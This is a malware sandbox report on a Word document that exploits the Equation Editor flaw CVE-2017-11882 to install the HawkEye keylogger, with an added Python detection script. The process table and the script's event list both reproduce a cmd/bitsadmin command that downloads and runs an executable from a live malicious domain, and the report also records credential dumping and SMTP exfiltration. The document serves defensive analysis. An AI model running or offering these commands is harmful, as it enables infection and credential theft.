File name: MV OCEAN EXPORTER.doc
Full analysis: https://app.any.run/tasks/86283e15-8c52-4b11-acc4-c7adbf4e2cf7
Verdict: Malicious activity
Threats:

HawkEye is often installed bundled with other malware. It is a Trojan and keylogger used to steal private information such as passwords and login credentials, and it includes anti-analysis and evasion features.

Analysis date: March 14, 2019, 08:33:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
exploit
CVE-2017-11882
loader
keylogger
hawkeye
stealer
evasion
trojan
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF, LF line terminators
MD5: C53D471B70CBCC4D698B1E0AF270AC0C
SHA1: 5F7F4ADE999E3BC19A5DE7135B937C0F196B0187
SHA256: A1673780273226028DC98F22E07262412B4DAD50D62C1BF34F47E40289E2B8F0
SSDEEP: 6144:K7p1JCaor5eQAMW8zXO0E456gQ+HFK9ANbQEPX+sPdqq9mZiXAMxqE6lJcRwYJhL:X

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Hjb.exe (PID: 2408)
      • Hjb.exe (PID: 3904)
    • Actions look like stealing of personal data

      • vbc.exe (PID: 2608)
      • vbc.exe (PID: 3384)
    • Stealing of credential data

      • vbc.exe (PID: 3384)
      • vbc.exe (PID: 2608)
    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2148)
    • Uses BITSADMIN.EXE for downloading application

      • cmd.exe (PID: 2884)
    • Detected Hawkeye Keylogger

      • Hjb.exe (PID: 3904)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • EQNEDT32.EXE (PID: 2148)
    • Executes scripts

      • Hjb.exe (PID: 3904)
    • Connects to SMTP port

      • Hjb.exe (PID: 3904)
    • Application launched itself

      • Hjb.exe (PID: 2408)
    • Loads DLL from Mozilla Firefox

      • vbc.exe (PID: 2608)
  • INFO

    • Application crashed

      • EQNEDT32.EXE (PID: 2148)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3072)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3072)
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 43
Monitored processes: 8
Malicious processes: 5
Suspicious processes: 1

Behavior graph

("no specs" marks a process that triggered no specific signature)

start
  winword.exe (no specs)
    eqnedt32.exe
      cmd.exe (no specs)
        bitsadmin.exe (no specs)
        hjb.exe (no specs)
          hjb.exe (#HAWKEYE)
            vbc.exe
            vbc.exe

Process information

PID 3072
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MV OCEAN EXPORTER.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 2148
  CMD: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Parent process: svchost.exe
  User: admin
  Company: Design Science, Inc.
  Integrity Level: MEDIUM
  Description: Microsoft Equation Editor
  Exit code: 0
  Version: 00110900

PID 2884
  CMD: cmd.exe /c bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe %USERPROFILE%\Hjb.exe && start %USERPROFILE%\Hjb.exe
  Path: C:\Windows\system32\cmd.exe
  Parent process: EQNEDT32.EXE
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows Command Processor
  Exit code: 0
  Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID 3408
  CMD: bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe C:\Users\admin\Hjb.exe
  Path: C:\Windows\system32\bitsadmin.exe
  Parent process: cmd.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: BITS administration utility
  Exit code: 0
  Version: 7.5.7600.16385 (win7_rtm.090713-1255)

PID 2408
  CMD: C:\Users\admin\Hjb.exe
  Path: C:\Users\admin\Hjb.exe
  Parent process: cmd.exe
  User: admin
  Company: Company name
  Integrity Level: MEDIUM
  Description: How is seen in task manager
  Exit code: 0
  Version: 1.0.0.0

PID 3904
  CMD: "C:\Users\admin\Hjb.exe"
  Path: C:\Users\admin\Hjb.exe
  Parent process: Hjb.exe
  User: admin
  Company: Company name
  Integrity Level: MEDIUM
  Description: How is seen in task manager
  Version: 1.0.0.0

PID 2608
  CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp5DE6.tmp"
  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  Parent process: Hjb.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Visual Basic Command Line Compiler
  Exit code: 0
  Version: 8.0.50727.5420

PID 3384
  CMD: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp7577.tmp"
  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  Parent process: Hjb.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Visual Basic Command Line Compiler
  Exit code: 0
  Version: 8.0.50727.5420
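The process table above is the whole infection chain, and it contains one detail that matters for detection engineering: EQNEDT32.EXE's parent is svchost.exe, not WINWORD.EXE, because the Equation Editor is started out-of-process through DCOM. A rule that looks for WINWORD.EXE spawning cmd.exe never fires on this sample; the reliable key is EQNEDT32.EXE as a parent. The Python below is an added example, not part of the ANY.RUN report: it replays process-creation records constructed from the table (PIDs, paths, command lines and parent names copied from it; the record field names and rule names are this example's own assumptions, not ANY.RUN's export schema) through a detector for the three chain links a defender would alert on: any child of EQNEDT32.EXE, a bitsadmin /transfer that pulls a URL into a user-writable path, and vbc.exe invoked with /stext, which is where the report attributes both credential-theft verdicts and the two dropped temp text files.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. Field names are this example's own, not ANY.RUN's export schema."""
    pid: int
    image: str          # full path of the created process
    cmdline: str        # command line as logged
    parent_image: str   # image name of the creating process, as the report's table shows it


# Constructed from the report's process table; PIDs, paths and command lines are copied from it.
EVENTS = [
    ProcEvent(3072, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\MV OCEAN EXPORTER.doc"',
              "explorer.exe"),
    ProcEvent(2148, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding',
              "svchost.exe"),  # DCOM launch: the parent is svchost.exe, not WINWORD.EXE
    ProcEvent(2884, r"C:\Windows\system32\cmd.exe",
              r"cmd.exe /c bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe %USERPROFILE%\Hjb.exe && start %USERPROFILE%\Hjb.exe",
              "EQNEDT32.EXE"),
    ProcEvent(3408, r"C:\Windows\system32\bitsadmin.exe",
              r"bitsadmin /transfer HN /priority foreground http://innovarefining.club/Abiguy/bigg.exe C:\Users\admin\Hjb.exe",
              "cmd.exe"),
    ProcEvent(2408, r"C:\Users\admin\Hjb.exe", r"C:\Users\admin\Hjb.exe", "cmd.exe"),
    ProcEvent(3904, r"C:\Users\admin\Hjb.exe", r'"C:\Users\admin\Hjb.exe"', "Hjb.exe"),
    ProcEvent(2608, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp5DE6.tmp"',
              "Hjb.exe"),
    ProcEvent(3384, r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\admin\AppData\Local\Temp\tmp7577.tmp"',
              "Hjb.exe"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# Locations an unprivileged user can write to: the %USERPROFILE% form is what the cmd.exe wrapper
# carries, the expanded C:\Users\ form is what bitsadmin.exe itself was handed.
USER_WRITABLE_RE = re.compile(r"%USERPROFILE%|%APPDATA%|%LOCALAPPDATA%|%TEMP%|%TMP%|C:\\Users\\", re.I)
STEXT_RE = re.compile(r"(^|\s)/stext(\s|$)", re.I)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path or bare image name."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule, detail) for every event that matches one of the three chain-link rules."""
    findings = []
    for ev in events:
        img, parent, cmd = _base(ev.image), _base(ev.parent_image), ev.cmdline.lower()

        # Rule 1: Equation Editor spawning anything at all (CVE-2017-11882 exploitation pattern).
        # Keyed on EQNEDT32.EXE as *parent*; its own parent is svchost.exe, so a WINWORD.EXE->child rule misses it.
        if parent == "eqnedt32.exe":
            findings.append((ev.pid, "equation_editor_child", img))

        # Rule 2: BITS used as a downloader into a user-writable path. Matches the cmd.exe /c wrapper
        # as well as bitsadmin.exe itself, as the report's own signature does for PID 2884.
        if "bitsadmin" in cmd and "/transfer" in cmd:
            urls = URL_RE.findall(ev.cmdline)
            if urls and USER_WRITABLE_RE.search(ev.cmdline):
                findings.append((ev.pid, "bits_download_to_user_path", urls[0]))

        # Rule 3: vbc.exe invoked with /stext. The report attributes both credential-theft verdicts and
        # the two dropped temp text files to exactly these vbc.exe instances, each spawned by Hjb.exe.
        if img == "vbc.exe" and STEXT_RE.search(ev.cmdline):
            findings.append((ev.pid, "vbc_stext_credential_dump", parent))
    return findings


def summarize(events):
    """Group rule hits by PID, preserving event order: {pid: [rule, ...]}."""
    out = {}
    for pid, rule, _ in detect(events):
        out.setdefault(pid, []).append(rule)
    return out


if __name__ == "__main__":
    for pid, rule, detail in detect(EVENTS):
        print(f"PID {pid:>5}  {rule:<28} {detail}")
```

The rules are keyed on the chain's fixed points (which process spawned what, and with which arguments) rather than on Hjb.exe, bigg.exe or innovarefining.club, which change from campaign to campaign; the hashes and domains in this report belong in a blocklist, the parent/child and argument patterns belong in a detection rule. WINWORD.EXE and EQNEDT32.EXE themselves produce no hit, so a document that merely opens the Equation Editor without it spawning a child stays quiet.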
Total events: 1 282
Read events: 609
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 0
Text files: 5
Unknown types: 4

Dropped files ("-" marks a value the report leaves blank)

PID 3072  WINWORD.EXE
  File: C:\Users\admin\AppData\Local\Temp\CVRDE0D.tmp.cvr
  Type: -
  MD5: -
  SHA256: -

PID 3904  Hjb.exe
  File: C:\Users\admin\AppData\Local\Temp\25291068-43af-3e16-50f6-5889d9ce7904
  Type: text
  MD5: 4F8D89971DF7015BA1E9815C512C1336
  SHA256: 9E350516978E5CB9A9A4788B221F7C5444FC59351ADAA3C45B681FADD89C8738

PID 3072  WINWORD.EXE
  File: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  Type: pgc
  MD5: 2A891164FE91BA6AC05B0BF649A261EA
  SHA256: DBE2D12E45090C02E4A69E55CEC720728F1BD7706358E7ED5CE8E9FC4F94AD32

PID 3072  WINWORD.EXE
  File: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\MV OCEAN EXPORTER.doc.LNK
  Type: lnk
  MD5: 905FF4383CD66BD078873CCE7DADF4A6
  SHA256: 13EA6C12E94D9AFCECCB6EE2C66AB603FEAAFFC87C486C3442E10738497F3D06

PID 3384  vbc.exe
  File: C:\Users\admin\AppData\Local\Temp\tmp7577.tmp
  Type: text
  MD5: 7FB9A9AD0FD9B1E0108ED71FBB276048
  SHA256: 7D63C301317E144B0133A72250AE2D8E09AF65A92E6A807EC58A71939FE530A9

PID 2608  vbc.exe
  File: C:\Users\admin\AppData\Local\Temp\tmp5DE6.tmp
  Type: text
  MD5: C48992AAE0E8FD5463A7B1617B2E0B88
  SHA256: 04802C51A3EE5E9F7D48462C50B17ABC0E84D54F5525D70E4C904BCC0634C3CE

PID 3072  WINWORD.EXE
  File: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
  Type: text
  MD5: E2EC29D9C2C63614603E6890FE2B1780
  SHA256: 57692798E28577113F05E0C871D46BFEEA79725650D57F89A1E911E5551E7487

PID 3072  WINWORD.EXE
  File: C:\Users\admin\Desktop\~$ OCEAN EXPORTER.doc
  Type: pgc
  MD5: 88BC190874711D95C7F01883CB90B286
  SHA256: AFA83840EAD638A5336EEB84BE0890B4CEE935D6D6D98B56D2666CC0ED1F0989
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 3
TCP/UDP connections: 3
DNS requests: 5
Threats: 0

HTTP requests ("-" marks a value the report leaves blank)

Request 1
  PID / Process: -
  Method: HEAD
  HTTP Code: 200
  IP: 80.82.222.59:80
  URL: http://innovarefining.club/Abiguy/bigg.exe
  CN: DE
  Type: -
  Size: -
  Reputation: suspicious

Request 2
  PID / Process: 3904 / Hjb.exe
  Method: GET
  HTTP Code: 200
  IP: 66.171.248.178:80
  URL: http://bot.whatismyipaddress.com/
  CN: US
  Type: text
  Size: 15 b
  Reputation: shared

Request 3
  PID / Process: -
  Method: GET
  HTTP Code: 200
  IP: 80.82.222.59:80
  URL: http://innovarefining.club/Abiguy/bigg.exe
  CN: DE
  Type: executable
  Size: 867 Kb
  Reputation: suspicious

Connections ("-" marks a value the report leaves blank)

PID 3904  Hjb.exe
  IP: 66.171.248.178:80
  Domain: bot.whatismyipaddress.com
  ASN: Alchemy Communications, Inc.
  CN: US
  Reputation: malicious

PID 3904  Hjb.exe
  IP: 202.52.147.118:587
  Domain: mail.valenciapesquero.com
  ASN: Global Media Teknologi, PT
  CN: ID
  Reputation: suspicious

PID -  Process -
  IP: 80.82.222.59:80
  Domain: innovarefining.club
  ASN: myLoc managed IT AG
  CN: DE
  Reputation: suspicious

DNS requests

Domain                      IP               Reputation
innovarefining.club         80.82.222.59     suspicious
bot.whatismyipaddress.com   66.171.248.178   shared
mail.valenciapesquero.com   202.52.147.118   unknown
dns.msftncsi.com            131.107.255.255  shared

Threats ("-" marks a value the report leaves blank)

PID -  Process -
  Class: A Network Trojan was detected
  Message: ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016

PID -  Process -
  Class: A Network Trojan was detected
  Message: ET CURRENT_EVENTS SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016

PID -  Process -
  Class: Potential Corporate Privacy Violation
  Message: ET POLICY PE EXE or DLL Windows file download HTTP

PID 3904  Hjb.exe
  Class: A Network Trojan was detected
  Message: MALWARE [PTsecurity] Spy.HawkEye IP Check

2 ETPRO signatures available at the full report
No debug info